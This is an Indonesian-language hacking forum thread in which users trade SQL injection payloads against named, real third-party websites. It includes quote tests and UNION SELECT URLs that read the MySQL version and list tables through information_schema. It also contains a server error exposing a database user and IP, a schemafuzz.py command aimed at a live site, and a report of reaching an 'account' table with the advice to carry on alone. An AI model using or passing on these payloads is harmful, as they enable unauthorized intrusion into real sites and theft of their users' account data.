[Bug] SQL injection pada News Read ID (read.php?)

[shinichi81]

boleh disikat nih bos poni..........

[peniru]

boleh disikat nih bos poni..........

:love: :love:

[cyber_criminal]

@om poni : om saya nyoba cek sqli di site ini :

Code: Select all

http://www.wellerpools.com/news-read.php?id=16'

trus pas saya cek versi mysqlnya ternyata versi 4,

Code: Select all

http://www.wellerpools.com/news-read.php?id=-16%20union%20select%20all%201,version%28%29,3,4,5,6,7,8,9,10

saya coba cek isi tablenya,

Code: Select all

http://www.wellerpools.com/news-read.php?id=-16%20union%20select%20all%201,group_concat%28table_name%29,3,4,5,6,7,8,9,10%20from%20information_schema.tables%20where%20table_schema=database%28%29--

eh malah keluar pesan, kayak gini :

Code: Select all

SELECT * FROM news WHERE news_id=-16 union select all 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
SELECT command denied to user 'main_wellerpools'@'72.167.232.226' for table 'tables'

apa yg mesti saya lakukan mas bila menghadapi hal seperti ini ? mohon pencerahannya
:kaca: :kaca: :kaca:

[cyber_criminal]

@om poni : tambahan satu lagi mas, saya mau cek bug sqlinya di site ini :

Code: Select all

http://campus.sanook.com/inlove/read.php?id=132'

pas saya masukin command order by, situsnya ngak nampilin error sedikitpun, kira2 itu masalahnya apa ya mas ?
saya coba pake command order by 1000000, tetapi tidak ada error sedikitpun

Code: Select all

http://campus.sanook.com/inlove/read.php?id=132%20order%20by%201000000

bingung saya mas
:pusing: :pusing: :pusing:

[peniru]

@om poni : tambahan satu lagi mas, saya mau cek bug sqlinya di site ini :

Code: Select all

http://campus.sanook.com/inlove/read.php?id=132'

pas saya masukin command order by, situsnya ngak nampilin error sedikitpun, kira2 itu masalahnya apa ya mas ?
saya coba pake command order by 1000000, tetapi tidak ada error sedikitpun

Code: Select all

http://campus.sanook.com/inlove/read.php?id=132%20order%20by%201000000

bingung saya mas
:pusing: :pusing: :pusing:

kk coba pake schemafuzz.py untuk find jumlah columnnya.

Code: Select all

./schemafuzz.py --findcol -u "http://campus.sanook.com/inlove/read.php?id=132"

moga membantu :maaf: :maaf:

[cyber_criminal]

cara make schemafuzzy.py nya mcam mana om peniru ?
:circle: :circle: :circle:

[poni]

@om poni : tambahan satu lagi mas, saya mau cek bug sqlinya di site ini :

Code: Select all

http://campus.sanook.com/inlove/read.php?id=132'

pas saya masukin command order by, situsnya ngak nampilin error sedikitpun, kira2 itu masalahnya apa ya mas ?
saya coba pake command order by 1000000, tetapi tidak ada error sedikitpun

Code: Select all

http://campus.sanook.com/inlove/read.php?id=132%20order%20by%201000000

bingung saya mas
:pusing: :pusing: :pusing:

Database : learntolove
Table : account

sisanya lanjutkan sendiri

[cyber_criminal]

ok makasih om poni

[x3nophobi4]

Mantep....dah...nyoba ah... :malumalu:

[shinichi81]

cara make schemafuzzy.py nya mcam mana om peniru ?
:circle: :circle: :circle:

pertama-tama instal dulu phyton,abis itu cari cmd...baru abis itu panggil tuh schemafuzzy.py :tapa: :tapa: :tapa: